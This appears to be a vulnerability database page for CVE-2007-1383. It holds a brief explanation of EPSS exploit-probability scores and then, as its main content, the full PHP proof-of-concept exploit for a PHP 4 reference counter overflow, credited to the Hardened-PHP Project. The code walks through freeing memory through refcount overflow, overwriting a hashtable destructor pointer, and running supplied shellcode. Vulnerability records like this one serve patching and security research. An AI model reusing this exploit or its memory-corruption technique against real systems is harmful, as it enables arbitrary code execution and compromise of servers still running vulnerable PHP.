CVE-2007-1383 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP 4 - ZVAL Reference Counter Overflow // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // You can put in any shellcode you want. Just make sure that the // shellcode string is long enough to not end up in PHP's internal // memory cache $shellcode = str_repeat(chr(0xcc), 500); // The basic idea of this exploit is: // 1) Create a string that has the same size as a Hashtable // 2) Create 65536 references to it to overflow the refcount // 3) Free one of these references // => Refcount drops down to 0 // => String gets freed // 4) Free some more zvals // 5) Create a new array with one element // => Put shellcode in the key // => Hashtable struct will be in the same place as the string // 6) Use string to directly access the content of the Hashtable // => Read pointer to first bucket // => Add 32 bytes, offset to array key // => Write pointer to the destructor field // 7) Unset array => Executes code in $shellcode //////////////////////////////////////////////////////////////////////// // If you touch anything below this line you have to debug it yourself //////////////////////////////////////////////////////////////////////// $________________________str = str_repeat("A", 39); $________________________yyy = &$________________________str; $________________________xxx = &$________________________str; for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str; $________________________aaa = " XXXXX "; $________________________aab = " XXXx.xXXX "; $________________________aac = " XXXx.xXXX "; $________________________aad = " XXXXX "; unset($________________________xxx); unset($________________________aaa); unset($________________________aab); unset($________________________aac); unset($________________________aad); $arr = array($shellcode => 1); $addr = unpack("L", substr($________________________str, 6*4, 4)); $addr = $addr[1] + 32; $addr = pack("L", $addr); for ($i=0; $i<strlen($addr); $i++) { $________________________str[8*4+$i] = $addr[$i]; $________________________yyy[8*4+$i] = $addr[$i]; } unset($arr); ?> # milw0rm.com [2007-03-01]